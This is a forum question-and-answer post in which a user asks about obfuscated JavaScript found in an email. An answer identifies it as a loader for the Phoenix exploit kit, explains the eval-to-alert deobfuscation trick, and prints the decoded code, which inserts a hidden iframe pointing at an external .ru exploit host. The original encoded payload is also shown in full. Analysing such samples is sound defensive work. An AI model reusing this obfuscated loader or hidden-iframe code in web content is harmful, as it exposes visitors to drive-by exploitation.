I found this in an email. Can someone tell me what it is trying to do? I am concerned it may be malicious.
I saw online that this might just be "optimized javascript." Is there a way to unoptomize it and see what it is trying to do?
<script>
c=2;
i=c-2;
if(parseInt("0123")===83)
if(window.document)
try{new String("asd").prototype.q}
catch(egewgsd){
f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i-6i81i67i62i78i66i23i1i11i10i1i-6i66i63i67i65i66i78i23i1i11i10i1i-6i77i78i83i70i63i23i1i80i67i77i67i60i67i70i67i78i83i20i66i67i62i62i63i72i21i74i73i77i67i78i67i73i72i20i59i60i77i73i70i79i78i63i21i70i63i64i78i20i10i21i78i73i74i20i10i21i1i24i22i9i67i64i76i59i71i63i24i-4i3i21i-25i-29i-29i87i-25i-29i-29i64i79i72i61i78i67i73i72i-6i67i64i76i59i71i63i76i2i3i85i-25i-29i-29i-29i80i59i76i-6i64i-6i23i-6i62i73i61i79i71i63i72i78i8i61i76i63i59i78i63i31i70i63i71i63i72i78i2i1i67i64i76i59i71i63i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i77i76i61i1i6i1i66i78i78i74i20i9i9i77i79i71i59i78i76i59i72i73i75i79i63i8i76i79i20i18i10i18i10i9i72i59i80i67i65i59i78i73i76i9i68i79i63i73i59i76i67i78i68i79i67i76i8i74i66i74i1i3i21i64i8i77i78i83i70i63i8i80i67i77i67i60i67i70i67i78i83i23i1i66i67i62i62i63i72i1i21i64i8i77i78i83i70i63i8i74i73i77i67i78i67i73i72i23i1i59i60i77i73i70i79i78i63i1i21i64i8i77i78i83i70i63i8i70i63i64i78i23i1i10i1i21i64i8i77i78i83i70i63i8i78i73i74i23i1i10i1i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i81i67i62i78i66i1i6i1i11i10i1i3i21i64i8i77i63i78i27i78i78i76i67i60i79i78i63i2i1i66i63i67i65i66i78i1i6i1i11i10i1i3i21i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i8i59i74i74i63i72i62i29i66i67i70i62i2i64i3i21i-25i-29i-29i87']
[0].split('i');
md='a';
v="eval";
}
if(v)e=window[v];
w=f;
s=[];
r=String;
for(;617!=i;i+=1){j=i;s+=r["fromCharCode"](38+1*w[j]);}
if(f)z=s;
e(z);
</script>
if (document.getElementsByTagName('body')[0]) {
iframer();
}
else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
It opens an IFrame that loads the Phoenix exploit kit. To see the Javascript code, change "eval" to "alert". Here it is:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://sumatranoque.ru:8080/navigator/jueoaritjuir.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://sumatranoque.ru:8080/navigator/jueoaritjuir.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With